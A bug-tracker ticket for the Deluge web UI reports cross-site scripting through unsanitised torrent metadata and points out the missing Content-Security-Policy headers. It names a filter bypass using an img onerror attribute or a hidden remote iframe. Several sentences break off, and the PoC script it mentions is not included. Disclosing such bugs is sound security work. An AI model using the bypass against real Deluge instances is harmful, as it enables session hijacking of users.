As the data from torrent files is not properly sanitised it's interpreted
directly as HTML. As such someone who supplies the user with a malicious
browser session. It should be noted that the Tornado webserver is not
configured to send any `Content-Security-Policy` headers which can help to
mitigate some of the impact. Due to this omission, the attacker can
download/upload arbitrary data from/to remote endpoints.
It should be noted there is some basic filtering such that a `<script>`
doesn't work, but this can be trivially bypassed by using a construct such
as `<img src="#" onerror=` or just a hidden, remote iframe which loads the
This script creates a PoC torrent to demonstrate the vulnerability:
the attached screenshot is taken after uploading a .torrent file generated
by that script.
Additionally there are several HTML injection bugs, for example in the
''Connection Manager'', but these are merely bugs as the local user
injects the payload as opposed to a remote attacker who uploads a
malicious torrent to a public search engine.
* Attachment "deluge xss.png" added.
Comment (by jasperla):
Please close this ticket, it's a duplicate of #3459.
Ticket URL: <https://dev.deluge-torrent.org/ticket/3460#comment:1>